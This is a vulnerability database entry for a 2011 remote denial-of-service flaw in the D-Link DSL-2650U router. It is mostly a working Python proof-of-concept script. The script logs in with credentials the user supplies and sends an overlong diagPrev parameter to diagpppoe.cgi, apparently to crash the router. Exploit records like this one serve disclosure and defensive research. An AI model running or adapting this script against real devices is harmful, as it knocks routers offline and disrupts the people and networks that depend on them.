ID
VAR-E-201107-0749
TITLE
D-Link DSL-2650U Denial Of Service
Trust: 0.5
DESCRIPTION
D-Link DSL-2650U remote denial of service proof of concept exploit.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | d link | model: | dsl-2650u | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
# Exploit Title: Dlink DSL-2650U DoS/PoC
# Date: July 6th, 2011
# Author: Li'el Fridman
# Software Link:
ftp://ftp.dlink.ru/pub/ADSL/DSL-2650U_BRU_D/Firmware/RU_1.20/DSL-2650U_BRU_D1_RU_1.20_06222011.zip
# Version: 1.20
# Tested on: Default firmware - Linux 2.6.8.1
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import urllib
ip = raw_input('Please enter the router address: ')
username = raw_input('Please enter the router user name: ')
password = raw_input('Please enter the router password: ')
path = 'http://{0}:{1}@{2}/diagpppoe.cgi?diagPrev=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.format(username, password, ip)
print 'Trying {0}'.format(path)
opener = urllib.urlopen(path)
print 'Owned!'
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TAGS
tag: | exploit | Trust: 0.5 |
tag: | remote | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
tag: | proof of concept | Trust: 0.5 |
CREDITS
Li'el Fridman
Trust: 0.5
EXTERNAL IDS
db: | PACKETSTORM | id: | 102890 | Trust: 0.5 |
SOURCES
db: | PACKETSTORM | id: | 102890 |
LAST UPDATE DATE
2022-07-27T09:59:07.464000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 102890 | date: | 2011-07-07T14:18:37 |